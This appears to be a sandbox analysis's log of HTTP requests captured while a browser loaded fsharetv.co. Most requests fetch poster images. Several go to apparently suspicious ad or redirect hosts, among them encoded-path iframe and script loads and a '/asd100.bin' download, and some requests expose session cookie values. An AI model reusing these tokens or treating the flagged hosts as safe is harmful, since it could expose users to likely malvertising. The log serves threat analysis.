Source: global trafficHTTP traffic detected: GET /images/M/MV5BODE3YWNkZGQtZGZjNy00NDZlLWI1MzAtZWUzYTgwM2NiZjA2XkEyXkFqcGc@._V1_SX300.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://fsharetv.co/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/M/MV5BNzM2YjIwMzgtZTg4Yy00NmJlLWIzOTYtYTQ0Zjc3NjIyZDcyXkEyXkFqcGdeQXVyMTQxNzMzNDI@._V1_SX300.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/M/MV5BZGViYTNjMTktMTQ3OS00NWNkLTk2Y2MtMGQ4M2JjZTUwOGRlXkEyXkFqcGc@._V1_SX300.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/M/MV5BMDdmZGU3NDQtY2E5My00ZTliLWIzOTUtMTY4ZGI1YjdiNjk3XkEyXkFqcGdeQXVyNTA4NzY1MzY@._V1_SX300.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/M/MV5BYjg3YjMyNGYtMWI5YS00ODgyLWIwOWUtODY2NzhmZGIyMzI1XkEyXkFqcGc@._V1_SX300.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/M/MV5BZWQyYmRlYzItZTdiYS00MmIwLThkMGMtMGJjYzQ0NThmNTMyXkEyXkFqcGdeQXVyNzM0MDQ1Mw@@._V1_SX300.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/M/MV5BZDk3YzBiOTItMTY3My00MWZhLWI5MTYtNDU5Yzk3NThjZDQzXkEyXkFqcGdeQXVyNzM3NDU4Njk@._V1_SX300.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /npm/sweetalert2@11 HTTP/1.1Host: cdn.jsdelivr.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/M/MV5BN2FmNGYzMGQtZDI1MS00NTIwLWE4MzUtMzJlNDA5ZjRiMzhkXkEyXkFqcGdeQXVyNTUyMzE4Mzg@._V1_SX300.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://fsharetv.co/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/M/MV5BY2IzZGY2YmEtYzljNS00NTM5LTgwMzUtMzM1NjQ4NGI0OTk0XkEyXkFqcGdeQXVyNDYyMDk5MTU@._V1_SX300.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://fsharetv.co/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/M/MV5BZDFlMjEyM2QtMGQ1NS00NWYzLTllMTItZTVmODcxZDY3ZDMzXkEyXkFqcGc@._V1_SX300.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/M/MV5BNzljYzQyNTMtNTdmZC00ZTM2LWJjN2YtMDNiOGI4Nzg1NThkXkEyXkFqcGdeQXVyNzc5MjA3OA@@._V1_SX300.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://fsharetv.co/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/M/MV5BZjc1OTI1N2QtYzY4OC00YzM0LWEyNWYtZWEyOTMxNTE4Yjk3XkEyXkFqcGc@._V1_SX300.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://fsharetv.co/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/M/MV5BZTYyMWUyOTQtM2VlNS00YTA4LWI0YTgtODg1ZDg5ZDQzYWI5XkEyXkFqcGdeQXVyNzc5MjA3OA@@._V1_SX300.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/M/MV5BNGM0ZTU3NmItZmRmMy00YWNjLWEzMWItYzg3MzcwZmM5NjdiXkEyXkFqcGdeQXVyNDYyMDk5MTU@._V1_SX300.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://fsharetv.co/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/M/MV5BODUyM2Y1MzgtZDIwNy00YzRjLTkyMGQtYzZiODI5MWEwZDdkXkEyXkFqcGdeQXVyMTQ2MjQyNDc@._V1_SX300.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://fsharetv.co/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/M/MV5BODE3YWNkZGQtZGZjNy00NDZlLWI1MzAtZWUzYTgwM2NiZjA2XkEyXkFqcGc@._V1_SX300.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/M/MV5BMDVkMWVmMjYtNjE3YS00YWIxLWE5MDgtMWUzMTIyYWJhMzA1XkEyXkFqcGc@._V1_SX300.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/M/MV5BMGJhOTk0NjEtYzcxNi00ZjQwLWE0ZDItMGZhMGYzMTRlMWZhXkEyXkFqcGc@._V1_SX300.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/M/MV5BYTk4YjhmNGMtOTZkYi00MjNmLThmZGItMGYyNDljNTdhNDA1XkEyXkFqcGdeQXVyNDE5MTU2MDE@._V1_SX300.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /js/disk.js?t=1589873325348 HTTP/1.1Host: fsharetv.coConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: wordpress-session=34f79ef2d2feacaff745d8f4e2d6bbfdsngS1BW0R2o90J1n6Wux%2B69DC%2F692EMJW1dZZeSIycxkceDS2q72gEXBHl0huU3Ouo62GAL8E4BqYdJdiAhHoME76BqDdNegDGM2JpZRcnKESouvC5sr9klmtikFTm9U; wordpress-session-values=7b129713a0d9f95787e394038040f843%2Bu2jfqgneMUQXS8X%2BX2CwlkyKGeUT4zL4PHvAvbDH%2BgWpmH0xfFdmiO%2B8AO%2F2wKWjjs35E%2F6ZAnTkyUzFOGk5SFWXTwdAEFMgtSYZJOV9ajJxUZBu6jDbYsOxfaqmdXV
Source: global trafficHTTP traffic detected: GET /MnB6NXdTEhlYSFNNGBMCQBxHEEV0VUhzEwAHQ1YTR0hOTRQGFQsbFF4fD1ERQB8UQVlcFQ4QRXQcN30bBiQ+WSN0GCNENVkhK30/dzk7cDV5Fh0BPmoHHRBFcCg8bzJ6GkNnImMDHnoyChU9XRNDJUp4IHQaDXATWjUNejJzNilnQhdCPHY/VVVIdz5zFxxnNn8TGWcmdCgCZANkQR5wL1scImBHYDobWR9nN0pjQ3pAK38xSxM/Yg9BJzFwD2Y2K3wQZxgjeDBqNi9tAH8iM3MhYCg/Wjx2Mk9/L2pEMHI2BiIzWUZUNB1BB3EHO20zdRs2dDJaOSNSHGQjEBgHQjMNdDh3IzNlNXQINnEfRTMpZDUENChZFGEeAmwmcxsvfiIHJj1NOl4kKGM7Yh4RfjUDFDZQH0UzKWM2XCUvZCJ0NxF5FAMIMVMxZCo/XUZCMw10EnojQ2YvAzIeUxBeJD9kGFgmPGMUYRcVfDZnRS1TNVExLAUfQjMNdDx1IwpsJloyHlMZCjYpXk5bMx1vEXYoP3xRWAMVWwcPNhJ9A0tFSlNEAzg9bTM HTTP/1.1Host: arketingefifortw.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://fsharetv.co/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /?udcwd=1092278 HTTP/1.1Host: d2w9cdu84xc4eq.cloudfront.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /asd100.bin HTTP/1.1Host: ukankingwithea.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Origin: https://fsharetv.coSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://fsharetv.co/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: ukankingwithea.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Origin: https://fsharetv.coSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://fsharetv.co/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/M/MV5BMzE5MDM1NDktY2I0OC00YWI5LTk2NzUtYjczNDczOWQxYjM0XkEyXkFqcGdeQXVyMTQxNzMzNDI@._V1_SX300.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://fsharetv.co/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /img/fsharetv.png HTTP/1.1Host: fsharetv.coConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: wordpress-session=34f79ef2d2feacaff745d8f4e2d6bbfdsngS1BW0R2o90J1n6Wux%2B69DC%2F692EMJW1dZZeSIycxkceDS2q72gEXBHl0huU3Ouo62GAL8E4BqYdJdiAhHoME76BqDdNegDGM2JpZRcnKESouvC5sr9klmtikFTm9U; wordpress-session-values=7b129713a0d9f95787e394038040f843%2Bu2jfqgneMUQXS8X%2BX2CwlkyKGeUT4zL4PHvAvbDH%2BgWpmH0xfFdmiO%2B8AO%2F2wKWjjs35E%2F6ZAnTkyUzFOGk5SFWXTwdAEFMgtSYZJOV9ajJxUZBu6jDbYsOxfaqmdXV
Source: global trafficHTTP traffic detected: GET /images/M/MV5BMTY4MTkxOTk1Nl5BMl5BanBnXkFtZTgwNjAyODgwMzE@._V1_SX300.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://fsharetv.co/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/M/MV5BZjc1OTI1N2QtYzY4OC00YzM0LWEyNWYtZWEyOTMxNTE4Yjk3XkEyXkFqcGc@._V1_SX300.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/M/MV5BNjZlOWE2MjUtZDZhNS00YzdkLTlkMzMtMWZmMGRlOTRiMmY3XkEyXkFqcGdeQXVyMjUyMTE3MTc@._V1_SX300.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://fsharetv.co/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/M/MV5BY2IzZGY2YmEtYzljNS00NTM5LTgwMzUtMzM1NjQ4NGI0OTk0XkEyXkFqcGdeQXVyNDYyMDk5MTU@._V1_SX300.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/M/MV5BNzljYzQyNTMtNTdmZC00ZTM2LWJjN2YtMDNiOGI4Nzg1NThkXkEyXkFqcGdeQXVyNzc5MjA3OA@@._V1_SX300.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/M/MV5BODUyM2Y1MzgtZDIwNy00YzRjLTkyMGQtYzZiODI5MWEwZDdkXkEyXkFqcGdeQXVyMTQ2MjQyNDc@._V1_SX300.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/M/MV5BNGM0ZTU3NmItZmRmMy00YWNjLWEzMWItYzg3MzcwZmM5NjdiXkEyXkFqcGdeQXVyNDYyMDk5MTU@._V1_SX300.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /jwjzcdhlaa.jpg HTTP/1.1Host: images.fsharetv.coConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://fsharetv.co/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/M/MV5BMzE5MDM1NDktY2I0OC00YWI5LTk2NzUtYjczNDczOWQxYjM0XkEyXkFqcGdeQXVyMTQxNzMzNDI@._V1_SX300.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /lMHl4TDlTFhYqBkQQHHEIAEBKfg4IXwg+XFZEHj9RUQsdOE8eGhdqU0MWFjwEdhEwOEAFSR5/CHg+IAgfRAMccRQFXxQtV1dEXilXU0RJalhUG0V4H0QJFycEWxsWKExTFQIgUhYMGXFUXwMRIFVRXEoKDB5JXX4JGA4RIl1fDgtpCwAXDGkLAEhIYgkVSj-ppCwAOESIPBFxLDhwCSQB6DRlcSnxYQAkUKU5VGxMlTRVLPnkKB1dLehwCSVAnUUQUFGkLc1xKfFVZEh1pCwAeHS9SX1BdfglTEQojVFVcSgoIAU5WfBcAV0hpCwAKGSpYQhBdfn8FSk9iCgZfDXEI HTTP/1.1Host: d2w9cdu84xc4eq.cloudfront.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://arketingefifortw.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/M/MV5BNjZlOWE2MjUtZDZhNS00YzdkLTlkMzMtMWZmMGRlOTRiMmY3XkEyXkFqcGdeQXVyMjUyMTE3MTc@._V1_SX300.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/M/MV5BMTY4MTkxOTk1Nl5BMl5BanBnXkFtZTgwNjAyODgwMzE@._V1_SX300.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/M/MV5BZWFjNGI2ODgtMTFmNi00NDU5LWIwNjEtZThmNjk0OTNlNWFiXkEyXkFqcGdeQXVyNjMwMjk0MTQ@._V1_SX300.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://fsharetv.co/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
